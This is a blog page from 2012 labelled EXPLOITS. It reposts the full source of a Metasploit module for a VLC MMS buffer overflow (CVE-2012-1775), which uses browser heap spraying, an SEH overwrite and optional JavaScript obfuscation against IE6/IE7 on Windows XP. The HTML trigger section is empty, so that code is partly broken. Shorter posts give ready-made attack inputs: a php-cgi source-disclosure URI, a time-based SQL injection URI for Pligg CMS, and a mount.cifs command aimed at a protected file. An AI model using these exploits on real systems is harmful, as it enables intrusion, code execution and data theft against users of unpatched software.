You Might Also Like

Showing posts with label EXPLOITS. Show all posts
Showing posts with label EXPLOITS. Show all posts

Saturday, May 5, 2012

VLC Media Player Multiple Remote Buffer Overflow Vulnerabilities

Exploit :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "VLC MMS Stream Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in VLC media player VLC media player prior
to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result
in a stack buffer overflow when handling a malicious MMS URI.

This module uses the browser as attack vector. A specially crafted MMS URI is
used to trigger the overflow and get flow control through SEH overwrite. Control
is transferred to code located in the heap through a standard heap spray.

The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2012-1775'],
['OSVDB', '80188'],
['URL', 'http://www.videolan.org/security/sa1201.html'],
# Fix commit diff
['URL', 'http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c']
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1000,
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
# Tested with VLC 2.0.0
[ 'Automatic', {} ],
[
'Internet Explorer 6 on XP SP3',
{
'Rop' => false,
# Space needed to overflow and generate an exception
# which allows to get control through SEH overwrite
'Offset' => 5488,
'OffsetShell' => '0x800 - code.length',
'Blocks' => '1550',
'Padding' => '0'
}
],
[
'Internet Explorer 7 on XP SP3',
{
'Rop' => false,
# Space needed to overflow and generate an exception
# which allows to get control through SEH overwrite
'Offset' => 5488,
'OffsetShell' => '0x800 - code.length',
'Blocks' => '1600',
'Padding' => '1'
}
]
],
'DisclosureDate' => "Mar 15 2012",
'DefaultTarget' => 0))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end

def get_target(cli, request)
#Default target
my_target = target

vprint_status("User-Agent: #{request.headers['User-Agent']}")

if target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP + IE 6
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + 7.0
my_target = targets[2]
else
#If we don't recognize the client, we don't fire the exploit
my_target = nil
end
end

return my_target
end

def on_request_uri(cli, request)
#Pick the right target
my_target = get_target(cli, request)
if my_target.nil?
vprint_error("Target not supported")
send_not_found(cli)
return
end

vprint_status("URL: #{request.uri.to_s}")

#ARCH used by the victim machine
arch = Rex::Arch.endian(my_target.arch)
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
code = Rex::Text.to_unescape(payload.encoded, arch)

# Spray overwrites 0x30303030 with our payload
spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{code}"); var nops = unescape("#{nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['OffsetShell']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=0; i < #{my_target['Blocks']}; i++) { heap_obj.alloc(block); } JS #Use heaplib js_spray = heaplib(spray) #obfuscate on demand if datastore['OBFUSCATE'] js_spray = ::Rex::Exploitation::JSObfu.new(js_spray) js_spray.obfuscate end src_ip = Rex::Socket.source_address.split('.') hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join # Try to maximize success on IE7 platform: # If first octet of IP address is minor than 16 pad with zero # even when heap spray could be not successful. # Else pad following target heap spray criteria. if ((hex_ip.to_i(16) >> 24) < 16) padding_char = '0' else padding_char = my_target['Padding'] end hex_ip = "0x#{padding_char * my_target['Offset']}#{hex_ip}" html = <<-EOS









EOS

#Remove extra tabs in HTML
html = html.gsub(/^\t\t/, "")

print_status("Sending malicious page")
send_response( cli, html, {'Content-Type' => 'text/html'} )
end
end
Posted by Abonk at 10:02 PM 0 comments
Labels:

Samba mount.cifs Local Security Bypass Vulnerability

The following example data is available:

/sbin/mount.cifs //127.0.0.1/a /root/secret_directory/secret_file
Posted by Abonk at 9:32 PM 0 comments
Labels:

PHP 'php-cgi' Information Disclosure Vulnerability

The Exploits :

An attacker can exploit this issue through a browser.

The following example URI is available:

http://www.example.com/index.php?-s


 Solution:
Updates are available. Please see the references for more information.
Posted by Abonk at 9:29 PM 0 comments
Labels:

Pligg CMS 'status' Parameter SQL Injection Vulnerability

 The Exploits :

Attackers can use a browser to exploit this issue.

The following example URI is available:

hxxp://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&amp;status='and+sleep(9)or+sleep(9)or+1%3D' &amp;search=on&amp;advancesearch= Search+&amp;sgroup=on&amp;stags=0&amp;slink=on&amp;scategory=on&amp;scomments=0&amp;suser=0

 Solution:
Updates are available. Please see the references for more details.
Posted by Abonk at 8:43 PM 0 comments
Labels:
Subscribe to: Posts (Atom)

Advertisements

Advertisements